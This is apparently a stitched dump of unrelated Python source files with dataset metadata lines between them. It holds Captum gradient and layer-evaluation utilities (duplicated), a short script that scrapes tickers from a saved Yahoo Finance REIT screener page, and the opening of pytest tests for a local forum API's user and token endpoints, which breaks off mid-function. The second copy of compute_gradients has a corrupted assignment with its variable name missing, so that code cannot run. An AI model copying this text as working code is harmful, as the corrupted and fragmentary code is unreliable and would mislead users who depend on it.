for the final module when computing input gradients, utilize
_forward_layer_eval_with_neuron_grads instead.
Args:
forward_fn: forward function. This can be for example model's
forward function.
layer: Layer for which gradients / output will be evaluated.
inputs: Input at which gradients are evaluated,
will be passed to forward_fn.
target_ind: Index of the target class for which gradients
must be computed (classification only).
output_fn: An optional function that is applied to the layer inputs or
outputs depending whether the `attribute_to_layer_input` is
set to `True` or `False`
args: Additional input arguments that forward function requires.
It takes an empty tuple (no additional arguments) if no
additional arguments are required
Returns:
2-element tuple of **gradients**, **evals**:
- **gradients**:
Gradients of output with respect to target layer output.
- **evals**:
Target layer output for given input.
"""
with torch.autograd.set_grad_enabled(True):
# saved_layer is a dictionary mapping device to a tuple of
# layer evaluations on that device.
saved_layer, output = _forward_layer_distributed_eval(
forward_fn,
inputs,
layer,
target_ind=target_ind,
additional_forward_args=additional_forward_args,
attribute_to_layer_input=attribute_to_layer_input,
forward_hook_with_return=True,
require_layer_grads=True,
)
assert output[0].numel() == 1, (
"Target not provided when necessary, cannot"
" take gradient with respect to multiple outputs."
)
device_ids = _extract_device_ids(forward_fn, saved_layer, device_ids)
# Identifies correct device ordering based on device ids.
# key_list is a list of devices in appropriate ordering for concatenation.
# If only one key exists (standard model), key list simply has one element.
key_list = _sort_key_list(
list(next(iter(saved_layer.values())).keys()), device_ids
)
all_outputs: Union[Tuple[Tensor, ...], List[Tuple[Tensor, ...]]]
if isinstance(layer, Module):
all_outputs = _reduce_list(
[
saved_layer[layer][device_id]
if output_fn is None
else output_fn(saved_layer[layer][device_id])
for device_id in key_list
]
)
else:
all_outputs = [
_reduce_list(
[
saved_layer[single_layer][device_id]
if output_fn is None
else output_fn(saved_layer[single_layer][device_id])
for device_id in key_list
]
)
for single_layer in layer
]
all_layers: List[Module] = [layer] if isinstance(layer, Module) else layer
grad_inputs = tuple(
layer_tensor
for single_layer in all_layers
for device_id in key_list
for layer_tensor in saved_layer[single_layer][device_id]
)
saved_grads = torch.autograd.grad(torch.unbind(output), grad_inputs)
offset = 0
all_grads: List[Tuple[Tensor, ...]] = []
for single_layer in all_layers:
num_tensors = len(next(iter(saved_layer[single_layer].values())))
curr_saved_grads = [
saved_grads[i : i + num_tensors]
for i in range(
offset, offset + len(key_list) * num_tensors, num_tensors
)
]
offset += len(key_list) * num_tensors
if output_fn is not None:
curr_saved_grads = [
output_fn(curr_saved_grad) for curr_saved_grad in curr_saved_grads
]
all_grads.append(_reduce_list(curr_saved_grads))
layer_grads: Union[Tuple[Tensor, ...], List[Tuple[Tensor, ...]]]
layer_grads = all_grads
if isinstance(layer, Module):
layer_grads = all_grads[0]
if gradient_neuron_selector is not None:
assert isinstance(
layer, Module
), "Cannot compute neuron gradients for multiple layers simultaneously!"
inp_grads = _neuron_gradients(
inputs, saved_layer[layer], key_list, gradient_neuron_selector
)
return (
cast(Tuple[Tensor, ...], layer_grads),
cast(Tuple[Tensor, ...], all_outputs),
inp_grads,
)
return layer_grads, all_outputs # type: ignore
def construct_neuron_grad_fn(
layer: Module,
neuron_selector: Union[int, Tuple[Union[int, slice], ...], Callable],
device_ids: Union[None, List[int]] = None,
attribute_to_neuron_input: bool = False,
) -> Callable:
def grad_fn(
forward_fn: Callable,
inputs: TensorOrTupleOfTensorsGeneric,
target_ind: TargetType = None,
additional_forward_args: Any = None,
) -> Tuple[Tensor, ...]:
_, grads = _forward_layer_eval_with_neuron_grads(
forward_fn,
inputs,
layer,
additional_forward_args,
gradient_neuron_selector=neuron_selector,
device_ids=device_ids,
attribute_to_layer_input=attribute_to_neuron_input,
)
return grads
return grad_fn
def _compute_jacobian_wrt_params(
model: Module,
inputs: Union[Tuple[Tensor], Tensor],
labels: Optional[Tensor] = None,
loss_fn: Optional[Union[Module, Callable]] = None,
) -> Tuple[Tensor, ...]:
r"""
Computes the Jacobian of a batch of test examples given a model, and optional
loss function and target labels. This method is equivalent to calculating the
gradient for every individual example in the minibatch.
Args:
model (torch.nn.Module): The trainable model providing the forward pass
inputs (Tensor): The minibatch for which the forward pass is computed.
The dimensions of input are (N, *) where N is the batch_size.
The input must have a batch dimension, even if batch_size = 1.
labels (Tensor or None): Labels for input if computing a loss function.
loss_fn (torch.nn.Module or Callable or None): The loss function. If a library
defined loss function is provided, it would be expected to be a
torch.nn.Module. If a custom loss is provided, it can be either type,
but must behave as a library loss function would if `reduction='none'`.
Returns:
grads (Tuple of Tensor): Returns the Jacobian for the minibatch as a
tuple of gradients corresponding to the tuple of trainable parameters
returned by `model.parameters()`. Each object grads[i] references to the
gradients for the parameters in the i-th trainable layer of the model.
Each grads[i] object is a tensor with the gradients for the `inputs`
batch. For example, grads[i][j] would reference the gradients for the
parameters of the i-th layer, for the j-th member of the minibatch.
"""
with torch.autograd.set_grad_enabled(True):
out = model(inputs)
assert out.dim() != 0, "Please ensure model output has at least one dimension."
if labels is not None and loss_fn is not None:
loss = loss_fn(out, labels)
if hasattr(loss_fn, "reduction"):
msg0 = "Please ensure loss_fn.reduction is set to `none`"
assert loss_fn.reduction == "none", msg0 # type: ignore
else:
msg1 = (
"Loss function is applying a reduction. Please ensure "
f"Output shape: {out.shape} and Loss shape: {loss.shape} "
"are matching."
)
assert loss.dim() != 0, msg1
assert out.shape[0] == loss.shape[0], msg1
out = loss
grads_list = [
torch.autograd.grad(
outputs=out[i],
inputs=model.parameters(), # type: ignore
grad_outputs=torch.ones_like(out[i]),
retain_graph=True,
)
for i in range(out.shape[0])
]
grads = tuple([torch.stack(x) for x in zip(*grads_list)])
return tuple(grads)
def _compute_jacobian_wrt_params_autograd_hacks(
model: Module,
inputs: Union[Tuple[Tensor], Tensor],
labels: Optional[Tensor] = None,
loss_fn: Optional[Module] = None,
reduction_type: Optional[str] = "sum",
) -> Tuple[Any, ...]:
r"""
NOT SUPPORTED FOR OPEN SOURCE. This method uses an internal 'hack` and is currently
not supported.
Computes the Jacobian of a batch of test examples given a model, and optional
loss function and target labels. This method uses autograd_hacks to fully vectorize
the Jacobian calculation. Currently, only linear and conv2d layers are supported.
User must `add_hooks(model)` before calling this function.
Args:
model (torch.nn.Module): The trainable model providing the forward pass
inputs (Tensor): The minibatch for which the forward pass is computed.
The dimensions of input are (N, *) where N is the batch_size.
The input must have a batch dimension, even if batch_size = 1.
labels (Tensor or None): Labels for input if computing a loss function.
loss_fn (torch.nn.Module or Callable or None): The loss function. If a library
defined loss function is provided, it would be expected to be a
torch.nn.Module. If a custom loss is provided, it can be either type,
but must behave as a library loss function would if `reduction='sum'` or
`reduction='mean'`.
reduction_type (str): The type of reduction applied. If a loss_fn is passed,
this should match `loss_fn.reduction`. Else if gradients are being
computed on direct model outputs (scores), then 'sum' should be used.
Defaults to 'sum'.
Returns:
grads (Tuple of Tensor): Returns the Jacobian for the minibatch as a
tuple of gradients corresponding to the tuple of trainable parameters
returned by `model.parameters()`. Each object grads[i] references to the
gradients for the parameters in the i-th trainable layer of the model.
Each grads[i] object is a tensor with the gradients for the `inputs`
batch. For example, grads[i][j] would reference the gradients for the
parameters of the i-th layer, for the j-th member of the minibatch.
"""
from captum._utils.fb import autograd_hacks
with torch.autograd.set_grad_enabled(True):
autograd_hacks.add_hooks(model)
out = model(inputs)
assert out.dim() != 0, "Please ensure model output has at least one dimension."
if labels is not None and loss_fn is not None:
loss = loss_fn(out, labels)
if hasattr(loss_fn, "reduction"):
msg0 = "Please ensure loss_fn.reduction is set to `sum` or `mean`"
assert loss_fn.reduction != "none", msg0
msg1 = (
f"loss_fn.reduction ({loss_fn.reduction}) does not match reduction "
f"type ({reduction_type}). Please ensure they are matching."
)
assert loss_fn.reduction == reduction_type, msg1
msg2 = (
"Please ensure custom loss function is applying either a "
"sum or mean reduction."
)
assert out.shape != loss.shape, msg2
if reduction_type != "sum" and reduction_type != "mean":
raise ValueError(
f"{reduction_type} is not a valid value for reduction_type. "
"Must be either 'sum' or 'mean'."
)
out = loss
model.zero_grad()
out.backward(gradient=torch.ones_like(out))
autograd_hacks.compute_grad1(model, loss_type=reduction_type)
grads = tuple(
param.grad1 # type: ignore
for param in model.parameters()
if hasattr(param, "grad1")
)
autograd_hacks.clear_backprops(model)
autograd_hacks.remove_hooks(model)
return grads
| 39.730546
| 148
| 0.639646
|
import threading
import typing
import warnings
from collections import defaultdict
from typing import Any, Callable, Dict, List, Optional, Tuple, Union, cast
import torch
from captum._utils.common import (
_reduce_list,
_run_forward,
_sort_key_list,
_verify_select_neuron,
)
from captum._utils.typing import (
Literal,
ModuleOrModuleList,
TargetType,
TensorOrTupleOfTensorsGeneric,
)
from torch import Tensor, device
from torch.nn import Module
def apply_gradient_requirements(
inputs: Tuple[Tensor, ...], warn: bool = True
) -> List[bool]:
assert isinstance(
inputs, tuple
), "Inputs should be wrapped in a tuple prior to preparing for gradients"
grad_required = []
for index, input in enumerate(inputs):
assert isinstance(input, torch.Tensor), "Given input is not a torch.Tensor"
grad_required.append(input.requires_grad)
inputs_dtype = input.dtype
if not inputs_dtype.is_floating_point and not (
hasattr(inputs_dtype, "is_complex") and inputs_dtype.is_complex
):
if warn:
warnings.warn(
"""Input Tensor %d has a dtype of %s.
Gradients cannot be activated
for these data types."""
% (index, str(inputs_dtype))
)
elif not input.requires_grad:
if warn:
warnings.warn(
"Input Tensor %d did not already require gradients, "
"required_grads has been set automatically." % index
)
input.requires_grad_()
return grad_required
def undo_gradient_requirements(
inputs: Tuple[Tensor, ...], grad_required: List[bool]
) -> None:
assert isinstance(
inputs, tuple
), "Inputs should be wrapped in a tuple prior to preparing for gradients."
assert len(inputs) == len(
grad_required
), "Input tuple length should match gradient mask."
for index, input in enumerate(inputs):
assert isinstance(input, torch.Tensor), "Given input is not a torch.Tensor"
if not grad_required[index]:
input.requires_grad_(False)
def compute_gradients(
forward_fn: Callable,
inputs: Union[Tensor, Tuple[Tensor, ...]],
target_ind: TargetType = None,
additional_forward_args: Any = None,
) -> Tuple[Tensor, ...]:
with torch.autograd.set_grad_enabled(True):
outputs = _run_forward(forward_fn, inputs, target_ind, additional_forward_args)
assert outputs[0].numel() == 1, (
"Target not provided when necessary, cannot"
" take gradient with respect to multiple outputs."
)
= torch.autograd.grad(torch.unbind(outputs), inputs,create_graph=True, retain_graph=True)
return grads
def _neuron_gradients(
inputs: Union[Tensor, Tuple[Tensor, ...]],
saved_layer: Dict[device, Tuple[Tensor, ...]],
key_list: List[device],
gradient_neuron_selector: Union[int, Tuple[Union[int, slice], ...], Callable],
) -> Tuple[Tensor, ...]:
with torch.autograd.set_grad_enabled(True):
gradient_tensors = []
for key in key_list:
current_out_tensor = _verify_select_neuron(
saved_layer[key], gradient_neuron_selector
)
gradient_tensors.append(
torch.autograd.grad(
torch.unbind(current_out_tensor)
if current_out_tensor.numel() > 1
else current_out_tensor,
inputs,
)
)
_total_gradients = _reduce_list(gradient_tensors, sum)
return _total_gradients
@typing.overload
def _forward_layer_eval(
forward_fn: Callable,
inputs: Union[Tensor, Tuple[Tensor, ...]],
layer: Module,
additional_forward_args: Any = None,
device_ids: Union[None, List[int]] = None,
attribute_to_layer_input: bool = False,
grad_enabled: bool = False,
) -> Tuple[Tensor, ...]:
...
@typing.overload
def _forward_layer_eval(
forward_fn: Callable,
inputs: Union[Tensor, Tuple[Tensor, ...]],
layer: List[Module],
additional_forward_args: Any = None,
device_ids: Union[None, List[int]] = None,
attribute_to_layer_input: bool = False,
grad_enabled: bool = False,
) -> List[Tuple[Tensor, ...]]:
...
def _forward_layer_eval(
forward_fn: Callable,
inputs: Union[Tensor, Tuple[Tensor, ...]],
layer: ModuleOrModuleList,
additional_forward_args: Any = None,
device_ids: Union[None, List[int]] = None,
attribute_to_layer_input: bool = False,
grad_enabled: bool = False,
) -> Union[Tuple[Tensor, ...], List[Tuple[Tensor, ...]]]:
return _forward_layer_eval_with_neuron_grads(
forward_fn,
inputs,
layer,
additional_forward_args=additional_forward_args,
gradient_neuron_selector=None,
grad_enabled=grad_enabled,
device_ids=device_ids,
attribute_to_layer_input=attribute_to_layer_input,
)
@typing.overload
def _forward_layer_distributed_eval(
forward_fn: Callable,
inputs: Union[Tensor, Tuple[Tensor, ...]],
layer: ModuleOrModuleList,
target_ind: TargetType = None,
additional_forward_args: Any = None,
attribute_to_layer_input: bool = False,
forward_hook_with_return: Literal[False] = False,
require_layer_grads: bool = False,
) -> Dict[Module, Dict[device, Tuple[Tensor, ...]]]:
...
@typing.overload
def _forward_layer_distributed_eval(
forward_fn: Callable,
inputs: Union[Tensor, Tuple[Tensor, ...]],
layer: ModuleOrModuleList,
target_ind: TargetType = None,
additional_forward_args: Any = None,
attribute_to_layer_input: bool = False,
*,
forward_hook_with_return: Literal[True],
require_layer_grads: bool = False,
) -> Tuple[Dict[Module, Dict[device, Tuple[Tensor, ...]]], Tensor]:
...
def _forward_layer_distributed_eval(
forward_fn: Callable,
inputs: Union[Tensor, Tuple[Tensor, ...]],
layer: ModuleOrModuleList,
target_ind: TargetType = None,
additional_forward_args: Any = None,
attribute_to_layer_input: bool = False,
forward_hook_with_return: bool = False,
require_layer_grads: bool = False,
) -> Union[
Tuple[Dict[Module, Dict[device, Tuple[Tensor, ...]]], Tensor],
Dict[Module, Dict[device, Tuple[Tensor, ...]]],
]:
saved_layer: Dict[Module, Dict[device, Tuple[Tensor, ...]]] = defaultdict(dict)
lock = threading.Lock()
all_layers: List[Module] = [layer] if isinstance(layer, Module) else layer
def hook_wrapper(original_module):
def forward_hook(module, inp, out=None):
eval_tsrs = inp if attribute_to_layer_input else out
is_eval_tuple = isinstance(eval_tsrs, tuple)
if not is_eval_tuple:
eval_tsrs = (eval_tsrs,)
if require_layer_grads:
apply_gradient_requirements(eval_tsrs, warn=False)
with lock:
nonlocal saved_layer
if forward_hook_with_return:
saved_layer[original_module][eval_tsrs[0].device] = eval_tsrs
eval_tsrs_to_return = tuple(
eval_tsr.clone() for eval_tsr in eval_tsrs
)
if not is_eval_tuple:
eval_tsrs_to_return = eval_tsrs_to_return[0]
return eval_tsrs_to_return
else:
saved_layer[original_module][eval_tsrs[0].device] = tuple(
eval_tsr.clone() for eval_tsr in eval_tsrs
)
return forward_hook
all_hooks = []
try:
for single_layer in all_layers:
if attribute_to_layer_input:
all_hooks.append(
single_layer.register_forward_pre_hook(hook_wrapper(single_layer))
)
else:
all_hooks.append(
single_layer.register_forward_hook(hook_wrapper(single_layer))
)
output = _run_forward(
forward_fn,
inputs,
target=target_ind,
additional_forward_args=additional_forward_args,
)
finally:
for hook in all_hooks:
hook.remove()
if len(saved_layer) == 0:
raise AssertionError("Forward hook did not obtain any outputs for given layer")
if forward_hook_with_return:
return saved_layer, output
return saved_layer
def _gather_distributed_tensors(
saved_layer: Dict[device, Tuple[Tensor, ...]],
device_ids: Union[None, List[int]] = None,
key_list: Union[None, List[device]] = None,
) -> Tuple[Tensor, ...]:
if key_list is None:
key_list = _sort_key_list(list(saved_layer.keys()), device_ids)
return _reduce_list([saved_layer[device_id] for device_id in key_list])
def _extract_device_ids(
forward_fn: Callable,
saved_layer: Dict[Module, Dict[device, Tuple[Tensor, ...]]],
device_ids: Union[None, List[int]],
) -> Union[None, List[int]]:
# Multiple devices / keys implies a DataParallel model, so we look for
# device IDs if given or available from forward function
# (DataParallel model object).
if (
max(len(saved_layer[single_layer]) for single_layer in saved_layer) > 1
and device_ids is None
):
if (
hasattr(forward_fn, "device_ids")
and cast(Any, forward_fn).device_ids is not None
):
device_ids = cast(Any, forward_fn).device_ids
else:
raise AssertionError(
"Layer tensors are saved on multiple devices, however unable to access"
" device ID list from the `forward_fn`. Device ID list must be"
" accessible from `forward_fn`. For example, they can be retrieved"
" if `forward_fn` is a model of type `DataParallel`. It is used"
" for identifying device batch ordering."
)
return device_ids
@typing.overload
def _forward_layer_eval_with_neuron_grads(
forward_fn: Callable,
inputs: Union[Tensor, Tuple[Tensor, ...]],
layer: Module,
additional_forward_args: Any = None,
*,
gradient_neuron_selector: Union[int, Tuple[Union[int, slice], ...], Callable],
grad_enabled: bool = False,
device_ids: Union[None, List[int]] = None,
attribute_to_layer_input: bool = False,
) -> Tuple[Tuple[Tensor, ...], Tuple[Tensor, ...]]:
...
@typing.overload
def _forward_layer_eval_with_neuron_grads(
forward_fn: Callable,
inputs: Union[Tensor, Tuple[Tensor, ...]],
layer: Module,
additional_forward_args: Any = None,
gradient_neuron_selector: None = None,
grad_enabled: bool = False,
device_ids: Union[None, List[int]] = None,
attribute_to_layer_input: bool = False,
) -> Tuple[Tensor, ...]:
...
@typing.overload
def _forward_layer_eval_with_neuron_grads(
forward_fn: Callable,
inputs: Union[Tensor, Tuple[Tensor, ...]],
layer: List[Module],
additional_forward_args: Any = None,
gradient_neuron_selector: None = None,
grad_enabled: bool = False,
device_ids: Union[None, List[int]] = None,
attribute_to_layer_input: bool = False,
) -> List[Tuple[Tensor, ...]]:
...
def _forward_layer_eval_with_neuron_grads(
forward_fn: Callable,
inputs: Union[Tensor, Tuple[Tensor, ...]],
layer: ModuleOrModuleList,
additional_forward_args: Any = None,
gradient_neuron_selector: Union[
None, int, Tuple[Union[int, slice], ...], Callable
] = None,
grad_enabled: bool = False,
device_ids: Union[None, List[int]] = None,
attribute_to_layer_input: bool = False,
) -> Union[
Tuple[Tuple[Tensor, ...], Tuple[Tensor, ...]],
Tuple[Tensor, ...],
List[Tuple[Tensor, ...]],
]:
grad_enabled = True if gradient_neuron_selector is not None else grad_enabled
with torch.autograd.set_grad_enabled(grad_enabled):
saved_layer = _forward_layer_distributed_eval(
forward_fn,
inputs,
layer,
additional_forward_args=additional_forward_args,
attribute_to_layer_input=attribute_to_layer_input,
)
device_ids = _extract_device_ids(forward_fn, saved_layer, device_ids)
# Identifies correct device ordering based on device ids.
# key_list is a list of devices in appropriate ordering for concatenation.
# If only one key exists (standard model), key list simply has one element.
key_list = _sort_key_list(list(next(iter(saved_layer.values())).keys()), device_ids)
if gradient_neuron_selector is not None:
assert isinstance(
layer, Module
), "Cannot compute neuron gradients for multiple layers simultaneously!"
inp_grads = _neuron_gradients(
inputs, saved_layer[layer], key_list, gradient_neuron_selector
)
return (
_gather_distributed_tensors(saved_layer[layer], key_list=key_list),
inp_grads,
)
else:
if isinstance(layer, Module):
return _gather_distributed_tensors(saved_layer[layer], key_list=key_list)
else:
return [
_gather_distributed_tensors(saved_layer[curr_layer], key_list=key_list)
for curr_layer in layer
]
@typing.overload
def compute_layer_gradients_and_eval(
forward_fn: Callable,
layer: Module,
inputs: Union[Tensor, Tuple[Tensor, ...]],
target_ind: TargetType = None,
additional_forward_args: Any = None,
*,
gradient_neuron_selector: Union[int, Tuple[Union[int, slice], ...], Callable],
device_ids: Union[None, List[int]] = None,
attribute_to_layer_input: bool = False,
output_fn: Union[None, Callable] = None,
) -> Tuple[Tuple[Tensor, ...], Tuple[Tensor, ...], Tuple[Tensor, ...]]:
...
@typing.overload
def compute_layer_gradients_and_eval(
forward_fn: Callable,
layer: List[Module],
inputs: Union[Tensor, Tuple[Tensor, ...]],
target_ind: TargetType = None,
additional_forward_args: Any = None,
gradient_neuron_selector: None = None,
device_ids: Union[None, List[int]] = None,
attribute_to_layer_input: bool = False,
output_fn: Union[None, Callable] = None,
) -> Tuple[List[Tuple[Tensor, ...]], List[Tuple[Tensor, ...]]]:
...
@typing.overload
def compute_layer_gradients_and_eval(
forward_fn: Callable,
layer: Module,
inputs: Union[Tensor, Tuple[Tensor, ...]],
target_ind: TargetType = None,
additional_forward_args: Any = None,
gradient_neuron_selector: None = None,
device_ids: Union[None, List[int]] = None,
attribute_to_layer_input: bool = False,
output_fn: Union[None, Callable] = None,
) -> Tuple[Tuple[Tensor, ...], Tuple[Tensor, ...]]:
...
def compute_layer_gradients_and_eval(
forward_fn: Callable,
layer: ModuleOrModuleList,
inputs: Union[Tensor, Tuple[Tensor, ...]],
target_ind: TargetType = None,
additional_forward_args: Any = None,
gradient_neuron_selector: Union[
None, int, Tuple[Union[int, slice], ...], Callable
] = None,
device_ids: Union[None, List[int]] = None,
attribute_to_layer_input: bool = False,
output_fn: Union[None, Callable] = None,
) -> Union[
Tuple[Tuple[Tensor, ...], Tuple[Tensor, ...]],
Tuple[Tuple[Tensor, ...], Tuple[Tensor, ...], Tuple[Tensor, ...]],
Tuple[List[Tuple[Tensor, ...]], List[Tuple[Tensor, ...]]],
]:
with torch.autograd.set_grad_enabled(True):
# saved_layer is a dictionary mapping device to a tuple of
# layer evaluations on that device.
saved_layer, output = _forward_layer_distributed_eval(
forward_fn,
inputs,
layer,
target_ind=target_ind,
additional_forward_args=additional_forward_args,
attribute_to_layer_input=attribute_to_layer_input,
forward_hook_with_return=True,
require_layer_grads=True,
)
assert output[0].numel() == 1, (
"Target not provided when necessary, cannot"
" take gradient with respect to multiple outputs."
)
device_ids = _extract_device_ids(forward_fn, saved_layer, device_ids)
# Identifies correct device ordering based on device ids.
# key_list is a list of devices in appropriate ordering for concatenation.
# If only one key exists (standard model), key list simply has one element.
key_list = _sort_key_list(
list(next(iter(saved_layer.values())).keys()), device_ids
)
all_outputs: Union[Tuple[Tensor, ...], List[Tuple[Tensor, ...]]]
if isinstance(layer, Module):
all_outputs = _reduce_list(
[
saved_layer[layer][device_id]
if output_fn is None
else output_fn(saved_layer[layer][device_id])
for device_id in key_list
]
)
else:
all_outputs = [
_reduce_list(
[
saved_layer[single_layer][device_id]
if output_fn is None
else output_fn(saved_layer[single_layer][device_id])
for device_id in key_list
]
)
for single_layer in layer
]
all_layers: List[Module] = [layer] if isinstance(layer, Module) else layer
grad_inputs = tuple(
layer_tensor
for single_layer in all_layers
for device_id in key_list
for layer_tensor in saved_layer[single_layer][device_id]
)
saved_grads = torch.autograd.grad(torch.unbind(output), grad_inputs)
offset = 0
all_grads: List[Tuple[Tensor, ...]] = []
for single_layer in all_layers:
num_tensors = len(next(iter(saved_layer[single_layer].values())))
curr_saved_grads = [
saved_grads[i : i + num_tensors]
for i in range(
offset, offset + len(key_list) * num_tensors, num_tensors
)
]
offset += len(key_list) * num_tensors
if output_fn is not None:
curr_saved_grads = [
output_fn(curr_saved_grad) for curr_saved_grad in curr_saved_grads
]
all_grads.append(_reduce_list(curr_saved_grads))
layer_grads: Union[Tuple[Tensor, ...], List[Tuple[Tensor, ...]]]
layer_grads = all_grads
if isinstance(layer, Module):
layer_grads = all_grads[0]
if gradient_neuron_selector is not None:
assert isinstance(
layer, Module
), "Cannot compute neuron gradients for multiple layers simultaneously!"
inp_grads = _neuron_gradients(
inputs, saved_layer[layer], key_list, gradient_neuron_selector
)
return (
cast(Tuple[Tensor, ...], layer_grads),
cast(Tuple[Tensor, ...], all_outputs),
inp_grads,
)
return layer_grads, all_outputs # type: ignore
def construct_neuron_grad_fn(
layer: Module,
neuron_selector: Union[int, Tuple[Union[int, slice], ...], Callable],
device_ids: Union[None, List[int]] = None,
attribute_to_neuron_input: bool = False,
) -> Callable:
def grad_fn(
forward_fn: Callable,
inputs: TensorOrTupleOfTensorsGeneric,
target_ind: TargetType = None,
additional_forward_args: Any = None,
) -> Tuple[Tensor, ...]:
_, grads = _forward_layer_eval_with_neuron_grads(
forward_fn,
inputs,
layer,
additional_forward_args,
gradient_neuron_selector=neuron_selector,
device_ids=device_ids,
attribute_to_layer_input=attribute_to_neuron_input,
)
return grads
return grad_fn
def _compute_jacobian_wrt_params(
model: Module,
inputs: Union[Tuple[Tensor], Tensor],
labels: Optional[Tensor] = None,
loss_fn: Optional[Union[Module, Callable]] = None,
) -> Tuple[Tensor, ...]:
with torch.autograd.set_grad_enabled(True):
out = model(inputs)
assert out.dim() != 0, "Please ensure model output has at least one dimension."
if labels is not None and loss_fn is not None:
loss = loss_fn(out, labels)
if hasattr(loss_fn, "reduction"):
msg0 = "Please ensure loss_fn.reduction is set to `none`"
assert loss_fn.reduction == "none", msg0 # type: ignore
else:
msg1 = (
"Loss function is applying a reduction. Please ensure "
f"Output shape: {out.shape} and Loss shape: {loss.shape} "
"are matching."
)
assert loss.dim() != 0, msg1
assert out.shape[0] == loss.shape[0], msg1
out = loss
grads_list = [
torch.autograd.grad(
outputs=out[i],
inputs=model.parameters(), # type: ignore
grad_outputs=torch.ones_like(out[i]),
retain_graph=True,
)
for i in range(out.shape[0])
]
grads = tuple([torch.stack(x) for x in zip(*grads_list)])
return tuple(grads)
def _compute_jacobian_wrt_params_autograd_hacks(
model: Module,
inputs: Union[Tuple[Tensor], Tensor],
labels: Optional[Tensor] = None,
loss_fn: Optional[Module] = None,
reduction_type: Optional[str] = "sum",
) -> Tuple[Any, ...]:
from captum._utils.fb import autograd_hacks
with torch.autograd.set_grad_enabled(True):
autograd_hacks.add_hooks(model)
out = model(inputs)
assert out.dim() != 0, "Please ensure model output has at least one dimension."
if labels is not None and loss_fn is not None:
loss = loss_fn(out, labels)
if hasattr(loss_fn, "reduction"):
msg0 = "Please ensure loss_fn.reduction is set to `sum` or `mean`"
assert loss_fn.reduction != "none", msg0
msg1 = (
f"loss_fn.reduction ({loss_fn.reduction}) does not match reduction "
f"type ({reduction_type}). Please ensure they are matching."
)
assert loss_fn.reduction == reduction_type, msg1
msg2 = (
"Please ensure custom loss function is applying either a "
"sum or mean reduction."
)
assert out.shape != loss.shape, msg2
if reduction_type != "sum" and reduction_type != "mean":
raise ValueError(
f"{reduction_type} is not a valid value for reduction_type. "
"Must be either 'sum' or 'mean'."
)
out = loss
model.zero_grad()
out.backward(gradient=torch.ones_like(out))
autograd_hacks.compute_grad1(model, loss_type=reduction_type)
grads = tuple(
param.grad1 # type: ignore
for param in model.parameters()
if hasattr(param, "grad1")
)
autograd_hacks.clear_backprops(model)
autograd_hacks.remove_hooks(model)
return grads
| true
| true
|
f70b35660098dbe1269746ca58b92936f76d8216
| 609
|
py
|
Python
|
reit_project/reit-data/get-reit.py
|
SamMonk/data-bot
|
2311870e993c5c2d1de617d31b3f7a6641da2a9b
|
[
"MIT"
] | null | null | null |
reit_project/reit-data/get-reit.py
|
SamMonk/data-bot
|
2311870e993c5c2d1de617d31b3f7a6641da2a9b
|
[
"MIT"
] | 5
|
2021-03-31T20:06:34.000Z
|
2022-03-12T00:58:22.000Z
|
reit_project/reit-data/get-reit.py
|
SamMonk/data-bot
|
2311870e993c5c2d1de617d31b3f7a6641da2a9b
|
[
"MIT"
] | null | null | null |
#https://finance.yahoo.com/screener/6039bb71-c189-4b62-ab6d-6dbd659495bb?count=200
import requests
from bs4 import BeautifulSoup
# import json
my_screener = requests.get(f'https://finance.yahoo.com/screener/6039bb71-c189-4b62-ab6d-6dbd659495bb?count=200')
#print(my_screener)
with open('code/reit-data/reits-screener.html','r') as ticker_report:
ticker_table_string = ticker_report.read()
soup = BeautifulSoup(ticker_table_string, "html.parser")
tables = soup.find_all("table")
#print(tables[0])
tickers = tables[0].find_all("a")
for ticker in tickers:
print(ticker.text)
| 30.45
| 112
| 0.740558
|
import requests
from bs4 import BeautifulSoup
my_screener = requests.get(f'https://finance.yahoo.com/screener/6039bb71-c189-4b62-ab6d-6dbd659495bb?count=200')
with open('code/reit-data/reits-screener.html','r') as ticker_report:
ticker_table_string = ticker_report.read()
soup = BeautifulSoup(ticker_table_string, "html.parser")
tables = soup.find_all("table")
tickers = tables[0].find_all("a")
for ticker in tickers:
print(ticker.text)
| true
| true
|
f70b3646b5d05db86a2415800f42bd74a54fb82f
| 7,072
|
py
|
Python
|
tests/test_users.py
|
AndreyAD1/forum
|
bae8bee6c45ca53b717c661a4dc624fec05aca35
|
[
"MIT"
] | null | null | null |
tests/test_users.py
|
AndreyAD1/forum
|
bae8bee6c45ca53b717c661a4dc624fec05aca35
|
[
"MIT"
] | null | null | null |
tests/test_users.py
|
AndreyAD1/forum
|
bae8bee6c45ca53b717c661a4dc624fec05aca35
|
[
"MIT"
] | null | null | null |
from collections import defaultdict
import logging
import random
from faker import Faker
import requests
logger = logging.getLogger(__file__)
def test_create_user():
fake = Faker()
user_info = {
'username': fake.first_name() + str(random.randint(1, 1000)),
'common_name': fake.name(),
'email': fake.email(),
'password': 'pass'
}
logger.info(f'Create the user: {user_info}')
response = requests.post(
'http://127.0.0.1:5000/api/v1/users/create',
json=user_info
)
logger.info(f'Receive response: {response.text}')
assert response.status_code == 201
response_json = response.json()
assert len(response_json) == 1
user_id = response_json.get('user_id')
assert user_id
assert isinstance(user_id, int)
def test_get_token():
fake = Faker()
user_info = {
'username': fake.first_name() + str(random.randint(1, 1000)),
'common_name': fake.name(),
'email': fake.email(),
'password': 'pass'
}
logger.info(f'Create the user: {user_info}')
response = requests.post(
'http://127.0.0.1:5000/api/v1/users/create',
json=user_info
)
logger.info(f'Receive response: {response.text}')
response = requests.post(
f'http://127.0.0.1:5000/api/v1/tokens',
auth=(user_info['username'], user_info['password'])
)
logger.info(f'Receive response: {response.text}')
assert response.status_code == 200
response_json = response.json()
assert len(response_json) == 1
token = response_json.get('token')
assert token
def test_get_user():
fake = Faker()
user_info = {
'username': fake.first_name() + str(random.randint(1, 1000)),
'common_name': fake.name(),
'email': fake.email(),
'password': 'pass'
}
logger.info(f'Create the user: {user_info}')
response = requests.post(
'http://127.0.0.1:5000/api/v1/users/create',
json=user_info
)
logger.info(f'Receive response: {response.text}')
user_id = response.json()['user_id']
response = requests.post(
f'http://127.0.0.1:5000/api/v1/tokens',
auth=(user_info['username'], user_info['password'])
)
logger.info(f'Receive response: {response.text}')
token = response.json()['token']
headers = {'Authorization': f'Bearer {token}'}
response = requests.get(
f'http://127.0.0.1:5000/api/v1/users/{user_id}',
headers=headers
)
logger.info(f'Receive response: {response.text}')
expected_user = {
'id': user_id,
'username': user_info['username'],
'common_name': user_info['common_name'],
'email': user_info['email']
}
assert response.status_code == 200
assert response.json() == expected_user
def test_update_user():
fake = Faker()
user_info = {
'username': fake.first_name() + str(random.randint(1, 1000)),
'common_name': fake.name(),
